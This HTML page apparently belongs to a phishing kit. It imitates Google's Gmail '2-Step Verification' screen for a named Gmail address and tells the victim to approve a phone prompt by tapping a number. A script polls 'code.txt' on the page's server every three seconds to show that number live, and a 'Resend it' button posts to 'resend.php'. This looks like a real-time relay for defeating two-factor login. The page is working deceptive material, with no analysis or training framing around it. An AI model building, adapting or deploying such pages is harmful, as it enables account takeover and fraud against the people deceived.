<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<meta name="chrome" content="nointentdetection">
		<link rel="shortcut icon" href="https://www.google.com/favicon.ico">
        <meta name="viewport" content="width=device-width, initial-scale=1">
		<meta name="description" content="Gmail is email that&#39;s intuitive, efficient and useful. 15 GB of storage, less spam and mobile access.">
        <title>Gmail</title>
		<style>
			#loading {
				display: none;
			}
		</style>
		<style>
			*,
			::before,
			::after {
				box-sizing: border-box;
				/* 1 */
				border-width: 0;
				/* 2 */
				border-style: solid;
				/* 2 */
				border-color: #e5e7eb;
				/* 2 */
			}
			::before,
			::after {
				--tw-content: "";
			}
			/*
1. Use a consistent sensible line-height in all browsers.
2. Prevent adjustments of font size after orientation changes in iOS.
3. Use a more readable tab size.
4. Use the user's configured `sans` font-family by default.
5. Use the user's configured `sans` font-feature-settings by default.
6. Use the user's configured `sans` font-variation-settings by default.
7. Disable tap highlights on iOS
*/
			html,
			:host {
				line-height: 1.5;
				/* 1 */
				-webkit-text-size-adjust: 100%;
				/* 2 */
				-moz-tab-size: 4;
				/* 3 */
				tab-size: 4;
				/* 3 */
				font-family: ui-sans-serif, system-ui, sans-serif, "Apple Color Emoji",
					"Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
				/* 4 */
				font-feature-settings: normal;
				/* 5 */
				font-variation-settings: normal;
				/* 6 */
				-webkit-tap-highlight-color: transparent;
				/* 7 */
			}
			/*
1. Remove the margin in all browsers.
2. Inherit line-height from `html` so users can set them as a class directly on the `html` element.
*/
			body {
				margin: 0;
				/* 1 */
				line-height: inherit;
				/* 2 */
			}
			/*
1. Add the correct height in Firefox.
2. Correct the inheritance of border color in Firefox. (https://bugzilla.mozilla.org/show_bug.cgi?id=190655)
3. Ensure horizontal rules are visible by default.
*/
			hr {
				height: 0;
				/* 1 */
				color: inherit;
				/* 2 */
				border-top-width: 1px;
				/* 3 */
			}
			/*
Add the correct text decoration in Chrome, Edge, and Safari.
*/
			abbr:where([title]) {
				text-decoration: underline dotted;
			}
			/*
Remove the default font size and weight for headings.
*/
			h1,
			h2,
			h3,
			h4,
			h5,
			h6 {
				font-size: inherit;
				font-weight: inherit;
			}
			/*
Reset links to optimize for opt-in styling instead of opt-out.
*/
			a {
				color: inherit;
				text-decoration: inherit;
			}
			/*
Add the correct font weight in Edge and Safari.
*/
			b,
			strong {
				font-weight: bolder;
			}
			/*
1. Use the user's configured `mono` font-family by default.
2. Use the user's configured `mono` font-feature-settings by default.
3. Use the user's configured `mono` font-variation-settings by default.
4. Correct the odd `em` font sizing in all browsers.
*/
			code,
			kbd,
			samp,
			pre {
				font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas,
					"Liberation Mono", "Courier New", monospace;
				/* 1 */
				font-feature-settings: normal;
				/* 2 */
				font-variation-settings: normal;
				/* 3 */
				font-size: 1em;
				/* 4 */
			}
			/*
Add the correct font size in all browsers.
*/
			small {
				font-size: 80%;
			}
			/*
Prevent `sub` and `sup` elements from affecting the line height in all browsers.
*/
			sub,
			sup {
				font-size: 75%;
				line-height: 0;
				position: relative;
				vertical-align: baseline;
			}
			sub {
				bottom: -0.25em;
			}
			sup {
				top: -0.5em;
			}
			/*
1. Remove text indentation from table contents in Chrome and Safari. (https://bugs.chromium.org/p/chromium/issues/detail?id=999088, https://bugs.webkit.org/show_bug.cgi?id=201297)
2. Correct table border color inheritance in all Chrome and Safari. (https://bugs.chromium.org/p/chromium/issues/detail?id=935729, https://bugs.webkit.org/show_bug.cgi?id=195016)
3. Remove gaps between table borders by default.
*/
			table {
				text-indent: 0;
				/* 1 */
				border-color: inherit;
				/* 2 */
				border-collapse: collapse;
				/* 3 */
			}
			/*
1. Change the font styles in all browsers.
2. Remove the margin in Firefox and Safari.
3. Remove default padding in all browsers.
*/
			button,
			input,
			optgroup,
			select,
			textarea {
				font-family: inherit;
				/* 1 */
				font-feature-settings: inherit;
				/* 1 */
				font-variation-settings: inherit;
				/* 1 */
				font-size: 100%;
				/* 1 */
				font-weight: inherit;
				/* 1 */
				line-height: inherit;
				/* 1 */
				letter-spacing: inherit;
				/* 1 */
				color: inherit;
				/* 1 */
				margin: 0;
				/* 2 */
				padding: 0;
				/* 3 */
			}
			/*
Remove the inheritance of text transform in Edge and Firefox.
*/
			button,
			select {
				text-transform: none;
			}
			/*
1. Correct the inability to style clickable types in iOS and Safari.
2. Remove default button styles.
*/
			button,
			input:where([type="button"]),
			input:where([type="reset"]),
			input:where([type="submit"]) {
				-webkit-appearance: button;
				/* 1 */
				background-color: transparent;
				/* 2 */
				background-image: none;
				/* 2 */
			}
			/*
Use the modern Firefox focus style for all focusable elements.
*/
			:-moz-focusring {
				outline: auto;
			}
			/*
Remove the additional `:invalid` styles in Firefox. (https://github.com/mozilla/gecko-dev/blob/2f9eacd9d3d995c937b4251a5557d95d494c9be1/layout/style/res/forms.css#L728-L737)
*/
			:-moz-ui-invalid {
				box-shadow: none;
			}
			/*
Add the correct vertical alignment in Chrome and Firefox.
*/
			progress {
				vertical-align: baseline;
			}
			/*
Correct the cursor style of increment and decrement buttons in Safari.
*/
			::-webkit-inner-spin-button,
			::-webkit-outer-spin-button {
				height: auto;
			}
			/*
1. Correct the odd appearance in Chrome and Safari.
2. Correct the outline style in Safari.
*/
			[type="search"] {
				-webkit-appearance: textfield;
				/* 1 */
				outline-offset: -2px;
				/* 2 */
			}
			/*
Remove the inner padding in Chrome and Safari on macOS.
*/
			::-webkit-search-decoration {
				-webkit-appearance: none;
			}
			/*
1. Correct the inability to style clickable types in iOS and Safari.
2. Change font properties to `inherit` in Safari.
*/
			::-webkit-file-upload-button {
				-webkit-appearance: button;
				/* 1 */
				font: inherit;
				/* 2 */
			}
			/*
Add the correct display in Chrome and Safari.
*/
			summary {
				display: list-item;
			}
			/*
Removes the default spacing and border for appropriate elements.
*/
			blockquote,
			dl,
			dd,
			h1,
			h2,
			h3,
			h4,
			h5,
			h6,
			hr,
			figure,
			p,
			pre {
				margin: 0;
			}
			fieldset {
				margin: 0;
				padding: 0;
			}
			legend {
				padding: 0;
			}
			ol,
			ul,
			menu {
				list-style: none;
				margin: 0;
				padding: 0;
			}
			/*
Reset default styling for dialogs.
*/
			dialog {
				padding: 0;
			}
			/*
Prevent resizing textareas horizontally by default.
*/
			textarea {
				resize: vertical;
			}
			/*
1. Reset the default placeholder opacity in Firefox. (https://github.com/tailwindlabs/tailwindcss/issues/3300)
2. Set the default placeholder color to the user's configured gray 400 color.
*/
			input::placeholder,
			textarea::placeholder {
				opacity: 1;
				/* 1 */
				color: #9ca3af;
				/* 2 */
			}
			/*
Set the default cursor for buttons.
*/
			button,
			[role="button"] {
				cursor: pointer;
			}
			/*
Make sure disabled buttons don't get the pointer cursor.
*/
			:disabled {
				cursor: default;
			}
			/*
1. Make replaced elements `display: block` by default. (https://github.com/mozdevs/cssremedy/issues/14)
2. Add `vertical-align: middle` to align replaced elements more sensibly by default. (https://github.com/jensimmons/cssremedy/issues/14#issuecomment-634934210)
   This can trigger a poorly considered lint error in some tools but is included by design.
*/
			img,
			svg,
			video,
			canvas,
			audio,
			iframe,
			embed,
			object {
				display: block;
				/* 1 */
				vertical-align: middle;
				/* 2 */
			}
			/*
Constrain images and videos to the parent width and preserve their intrinsic aspect ratio. (https://github.com/mozdevs/cssremedy/issues/14)
*/
			img,
			video {
				max-width: 100%;
				height: auto;
			}
			/* Make elements with the HTML hidden attribute stay hidden by default */
			[hidden] {
				display: none;
			}
			*,
			::before,
			::after {
				--tw-border-spacing-x: 0;
				--tw-border-spacing-y: 0;
				--tw-translate-x: 0;
				--tw-translate-y: 0;
				--tw-rotate: 0;
				--tw-skew-x: 0;
				--tw-skew-y: 0;
				--tw-scale-x: 1;
				--tw-scale-y: 1;
				--tw-pan-x: ;
				--tw-pan-y: ;
				--tw-pinch-zoom: ;
				--tw-scroll-snap-strictness: proximity;
				--tw-gradient-from-position: ;
				--tw-gradient-via-position: ;
				--tw-gradient-to-position: ;
				--tw-ordinal: ;
				--tw-slashed-zero: ;
				--tw-numeric-figure: ;
				--tw-numeric-spacing: ;
				--tw-numeric-fraction: ;
				--tw-ring-inset: ;
				--tw-ring-offset-width: 0px;
				--tw-ring-offset-color: #fff;
				--tw-ring-color: rgb(59 130 246 / 0.5);
				--tw-ring-offset-shadow: 0 0 #0000;
				--tw-ring-shadow: 0 0 #0000;
				--tw-shadow: 0 0 #0000;
				--tw-shadow-colored: 0 0 #0000;
				--tw-blur: ;
				--tw-brightness: ;
				--tw-contrast: ;
				--tw-grayscale: ;
				--tw-hue-rotate: ;
				--tw-invert: ;
				--tw-saturate: ;
				--tw-sepia: ;
				--tw-drop-shadow: ;
				--tw-backdrop-blur: ;
				--tw-backdrop-brightness: ;
				--tw-backdrop-contrast: ;
				--tw-backdrop-grayscale: ;
				--tw-backdrop-hue-rotate: ;
				--tw-backdrop-invert: ;
				--tw-backdrop-opacity: ;
				--tw-backdrop-saturate: ;
				--tw-backdrop-sepia: ;
				--tw-contain-size: ;
				--tw-contain-layout: ;
				--tw-contain-paint: ;
				--tw-contain-style: ;
			}
			::backdrop {
				--tw-border-spacing-x: 0;
				--tw-border-spacing-y: 0;
				--tw-translate-x: 0;
				--tw-translate-y: 0;
				--tw-rotate: 0;
				--tw-skew-x: 0;
				--tw-skew-y: 0;
				--tw-scale-x: 1;
				--tw-scale-y: 1;
				--tw-pan-x: ;
				--tw-pan-y: ;
				--tw-pinch-zoom: ;
				--tw-scroll-snap-strictness: proximity;
				--tw-gradient-from-position: ;
				--tw-gradient-via-position: ;
				--tw-gradient-to-position: ;
				--tw-ordinal: ;
				--tw-slashed-zero: ;
				--tw-numeric-figure: ;
				--tw-numeric-spacing: ;
				--tw-numeric-fraction: ;
				--tw-ring-inset: ;
				--tw-ring-offset-width: 0px;
				--tw-ring-offset-color: #fff;
				--tw-ring-color: rgb(59 130 246 / 0.5);
				--tw-ring-offset-shadow: 0 0 #0000;
				--tw-ring-shadow: 0 0 #0000;
				--tw-shadow: 0 0 #0000;
				--tw-shadow-colored: 0 0 #0000;
				--tw-blur: ;
				--tw-brightness: ;
				--tw-contrast: ;
				--tw-grayscale: ;
				--tw-hue-rotate: ;
				--tw-invert: ;
				--tw-saturate: ;
				--tw-sepia: ;
				--tw-drop-shadow: ;
				--tw-backdrop-blur: ;
				--tw-backdrop-brightness: ;
				--tw-backdrop-contrast: ;
				--tw-backdrop-grayscale: ;
				--tw-backdrop-hue-rotate: ;
				--tw-backdrop-invert: ;
				--tw-backdrop-opacity: ;
				--tw-backdrop-saturate: ;
				--tw-backdrop-sepia: ;
				--tw-contain-size: ;
				--tw-contain-layout: ;
				--tw-contain-paint: ;
				--tw-contain-style: ;
			}
			.relative {
				position: relative;
			}
			.col-span-full {
				grid-column: 1 / -1;
			}
			.mx-5 {
				margin-left: 1.25rem;
				margin-right: 1.25rem;
			}
			.mx-auto {
				margin-left: auto;
				margin-right: auto;
			}
			.mt-20 {
				margin-top: 5rem;
			}
			.inline-block {
				display: inline-block;
			}
			.flex {
				display: flex;
			}
			.grid {
				display: grid;
			}
			.h-4 {
				height: 1rem;
			}
			.h-5 {
				height: 1.25rem;
			}
			.h-7 {
				height: 1.75rem;
			}
			.min-h-screen {
				min-height: 100vh;
			}
			.w-4 {
				width: 1rem;
			}
			.w-7 {
				width: 1.75rem;
			}
			.w-fit {
				width: fit-content;
			}
			.w-full {
				width: 100%;
			}
			.min-w-0 {
				min-width: 0px;
			}
			.max-w-md {
				max-width: 28rem;
			}
			.max-w-xl {
				max-width: 36rem;
			}
			.flex-1 {
				flex: 1 1 0%;
			}
			.select-none {
				user-select: none;
			}
			.grid-cols-2 {
				grid-template-columns: repeat(2, minmax(0, 1fr));
			}
			.flex-col {
				flex-direction: column;
			}
			.items-start {
				align-items: flex-start;
			}
			.items-center {
				align-items: center;
			}
			.justify-center {
				justify-content: center;
			}
			.justify-between {
				justify-content: space-between;
			}
			.gap-2 {
				gap: 0.5rem;
			}
			.space-x-2 > :not([hidden]) ~ :not([hidden]) {
				--tw-space-x-reverse: 0;
				margin-right: calc(0.5rem * var(--tw-space-x-reverse));
				margin-left: calc(0.5rem * calc(1 - var(--tw-space-x-reverse)));
			}
			.space-x-5 > :not([hidden]) ~ :not([hidden]) {
				--tw-space-x-reverse: 0;
				margin-right: calc(1.25rem * var(--tw-space-x-reverse));
				margin-left: calc(1.25rem * calc(1 - var(--tw-space-x-reverse)));
			}
			.space-y-4 > :not([hidden]) ~ :not([hidden]) {
				--tw-space-y-reverse: 0;
				margin-top: calc(1rem * calc(1 - var(--tw-space-y-reverse)));
				margin-bottom: calc(1rem * var(--tw-space-y-reverse));
			}
			.space-y-6 > :not([hidden]) ~ :not([hidden]) {
				--tw-space-y-reverse: 0;
				margin-top: calc(1.5rem * calc(1 - var(--tw-space-y-reverse)));
				margin-bottom: calc(1.5rem * var(--tw-space-y-reverse));
			}
			.space-y-8 > :not([hidden]) ~ :not([hidden]) {
				--tw-space-y-reverse: 0;
				margin-top: calc(2rem * calc(1 - var(--tw-space-y-reverse)));
				margin-bottom: calc(2rem * var(--tw-space-y-reverse));
			}
			.overflow-hidden {
				overflow: hidden;
			}
			.rounded {
				border-radius: 0.25rem;
			}
			.rounded-3xl {
				border-radius: 1.5rem;
			}
			.border {
				border-width: 1px;
			}
			.border-black\/65 {
				border-color: rgb(0 0 0 / 0.65);
			}
			.border-gray-300 {
				--tw-border-opacity: 1;
				border-color: rgb(209 213 219 / var(--tw-border-opacity));
			}
			.bg-\[\#f1f3fa\] {
				--tw-bg-opacity: 1;
				background-color: rgb(241 243 250 / var(--tw-bg-opacity));
			}
			.bg-white {
				--tw-bg-opacity: 1;
				background-color: rgb(255 255 255 / var(--tw-bg-opacity));
			}
			.p-2 {
				padding: 0.5rem;
			}
			.px-3 {
				padding-left: 0.75rem;
				padding-right: 0.75rem;
			}
			.px-6 {
				padding-left: 1.5rem;
				padding-right: 1.5rem;
			}
			.px-8 {
				padding-left: 2rem;
				padding-right: 2rem;
			}
			.py-1 {
				padding-top: 0.25rem;
				padding-bottom: 0.25rem;
			}
			.py-4 {
				padding-top: 1rem;
				padding-bottom: 1rem;
			}
			.py-6 {
				padding-top: 1.5rem;
				padding-bottom: 1.5rem;
			}
			.pl-1 {
				padding-left: 0.25rem;
			}
			.pr-3 {
				padding-right: 0.75rem;
			}
			.pt-14 {
				padding-top: 3.5rem;
			}
			.text-center {
				text-align: center;
			}
			.text-3xl {
				font-size: 1.875rem;
				line-height: 2.25rem;
			}
			.text-4xl {
				font-size: 2.25rem;
				line-height: 2.5rem;
			}
			.text-base {
				font-size: 1rem;
				line-height: 1.5rem;
			}
			.text-sm {
				font-size: 0.875rem;
				line-height: 1.25rem;
			}
			.font-medium {
				font-weight: 500;
			}
			.font-semibold {
				font-weight: 600;
			}
			.leading-7 {
				line-height: 1.75rem;
			}
			.text-\[\#0b57d0\] {
				--tw-text-opacity: 1;
				color: rgb(11 87 208 / var(--tw-text-opacity));
			}
			.text-black\/75 {
				color: rgb(0 0 0 / 0.75);
			}
			.text-black\/85 {
				color: rgb(0 0 0 / 0.85);
			}
			.text-gray-600 {
				--tw-text-opacity: 1;
				color: rgb(75 85 99 / var(--tw-text-opacity));
			}
			.ring-1 {
				--tw-ring-offset-shadow: var(--tw-ring-inset) 0 0 0
					var(--tw-ring-offset-width) var(--tw-ring-offset-color);
				--tw-ring-shadow: var(--tw-ring-inset) 0 0 0
					calc(1px + var(--tw-ring-offset-width)) var(--tw-ring-color);
				box-shadow: var(--tw-ring-offset-shadow), var(--tw-ring-shadow),
					var(--tw-shadow, 0 0 #0000);
			}
			.ring-gray-900\/5 {
				--tw-ring-color: rgb(17 24 39 / 0.05);
			}
			.hover\:bg-slate-100:hover {
				--tw-bg-opacity: 1;
				background-color: rgb(241 245 249 / var(--tw-bg-opacity));
			}
			.focus\:ring-\[\#0b57d0\]:focus {
				--tw-ring-opacity: 1;
				--tw-ring-color: rgb(11 87 208 / var(--tw-ring-opacity));
			}
			@media (min-width: 640px) {
				.sm\:py-12 {
					padding-top: 3rem;
					padding-bottom: 3rem;
				}
			}
			@media (min-width: 768px) {
				.md\:col-span-1 {
					grid-column: span 1 / span 1;
				}
				.md\:h-\[550px\] {
					height: 550px;
				}
				.md\:justify-end {
					justify-content: flex-end;
				}
			}
		</style>
		<!-- <script src="https://cdn.tailwindcss.com"></script> -->
	</head>
	<body>
		<div
			class="flex min-h-screen flex-col justify-center overflow-hidden bg-[#f1f3fa] py-6 sm:py-12"
		>
			<div class="mx-auto">
				<div
					class="shadow-3xl mx-5 gap-2 rounded-3xl bg-white px-6 pt-14 ring-1 ring-gray-900/5 md:h-[550px]"
				>
					<div class="flex flex-col justify-between space-y-8">
						<div class="grid grid-cols-2 py-4">
							<div class="col-span-full mx-auto max-w-xl md:col-span-1">
								<div class="grid gap-2 px-3">
									<svg
										xmlns="https://www.w3.org/2000/svg"
										width="48"
										height="48"
										viewBox="0 0 48 48"
										aria-hidden="true"
										jsname="jjf7Ff"
									>
										<path
											fill="#4285F4"
											d="M45.12 24.5c0-1.56-.14-3.06-.4-4.5H24v8.51h11.84c-.51 2.75-2.06 5.08-4.39 6.64v5.52h7.11c4.16-3.83 6.56-9.47 6.56-16.17z"
										></path>
										<path
											fill="#34A853"
											d="M24 46c5.94 0 10.92-1.97 14.56-5.33l-7.11-5.52c-1.97 1.32-4.49 2.1-7.45 2.1-5.73 0-10.58-3.87-12.31-9.07H4.34v5.7C7.96 41.07 15.4 46 24 46z"
										></path>
										<path
											fill="#FBBC05"
											d="M11.69 28.18C11.25 26.86 11 25.45 11 24s.25-2.86.69-4.18v-5.7H4.34C2.85 17.09 2 20.45 2 24c0 3.55.85 6.91 2.34 9.88l7.35-5.7z"
										></path>
										<path
											fill="#EA4335"
											d="M24 10.75c3.23 0 6.13 1.11 8.41 3.29l6.31-6.31C34.91 4.18 29.93 2 24 2 15.4 2 7.96 6.93 4.34 14.12l7.35 5.7c1.73-5.2 6.58-9.07 12.31-9.07z"
										></path>
										<path fill="none" d="M2 2h44v44H2z"></path>
									</svg>
									<div class="space-y-4 py-4 text-base leading-7 text-gray-600">
										<h1 class="text-3xl font-semibold text-black/85">
											2-Step Verification
										</h1>
										<p class="text-sm text-black/85">
											To help keep your account safe, Google wants to make sure
											that it’s really you trying to sign in
										</p>
									</div>
									<div
										class="flex items-center border text-black/85 border-black/65 w-fit rounded-3xl"
									>
										<svg
											class="h-7 w-7 pl-1"
											aria-hidden="true"
											class="Qk3oof"
											fill="currentColor"
											focusable="false"
											width="48px"
											height="48px"
											viewBox="0 0 24 24"
											xmlns="https://www.w3.org/2000/svg"
										>
											<path
												d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"
											></path>
										</svg>
										<p class="pl-1 pr-3 text-sm font-semibold text-black/75">
											peteromolloz@gmail.com
										</p>
									</div>
								</div>
							</div>
							<div
								class="col-span-full mx-auto mt-20 flex max-w-md flex-col justify-between md:col-span-1"
							>
								<div class="">
									<div class="space-y-6 py-6 text-base leading-7 text-black/85">
										<div class="grid gap-2">
											<h1
												id="result"
												class="text-center text-4xl font-semibold text-black/85"
											>
												34
											</h1>
											<!-- <div id="loading">Loading...</div> -->
											<p class="font-medium">Check your Iphone</p>
											<p class="text-sm">
												Google sent a notification to your Iphone. Tap
												<span class="font-semibold">Yes</span> on the
												notification, then tap
												<span id="result2" class="font-semibold inline-block"
													>34</span
												>
												on your phone to verify that it’s you.
											</p>
										</div>
									</div>
									<fieldset>
										<div class="">
											<div class="relative flex items-start space-x-2 py-4">
												<div class="flex h-5 items-center">
													<input
														name="device"
														type="checkbox"
														class="h-4 w-4 rounded border-gray-300 text-[#0b57d0] focus:ring-[#0b57d0]"
													/>
												</div>
												<div class="min-w-0 flex-1 text-sm">
													<label for="device" class="select-none"
														>Dont ask again on this device</label
													>
												</div>
											</div>
										</div>
									</fieldset>
								</div>
							</div>
						</div>

						<div class="py-4">
							<form novalidate="" method="post" action="./resend.php">
								<button
									class="w-fit rounded-3xl px-3 py-1 text-sm font-medium text-[#0b57d0] hover:bg-slate-100"
								>
									Resend it
								</button>
							</form>
							<div class="flex w-full md:justify-end">
								<p
									class="rounded-3xl p-2 text-sm font-medium text-[#0b57d0] hover:bg-slate-100"
								>
									Try another way
								</p>
							</div>
						</div>
					</div>
				</div>

				<div class="flex justify-between px-8 py-4">
					<p>English (United Kingdom)</p>
					<div class="flex space-x-5">
						<p>Help</p>
						<p>Privacy</p>
						<p>Terms</p>
					</div>
				</div>
			</div>
		</div>

		<script>
			document.addEventListener("DOMContentLoaded", (event) => {
				// Function to fetch the number from the server
				function fetchNumber() {
					// Show the loading message
					// document.getElementById('loading').innerHTML = '<p>Loading...</p>';

					const domainUrl = window.location.origin;

					// Fetch the result from the PHP server
					fetch(`${domainUrl}/code.txt`)
						.then((response) => response.text())
						.then((data) => {
							// Hide the loading message
							// document.getElementById('loading').innerHTML = '';

							// Display the result
							document.getElementById("result").innerText = data;
							document.getElementById("result2").innerText = data;
						})
						.catch((error) => {
							// Hide the loading message
							// document.getElementById('loading').innerHTML = '';

							// Display the error
							document.getElementById("result").innerHTML = "loading...";
							document.getElementById("result2").innerText = "";
						});
				}

				// Call the fetch function once when the page loads
				fetchNumber();

				// Fetch the number every 10 seconds
				setInterval(fetchNumber, 3000);
			});
		</script>
	</body>
</html>
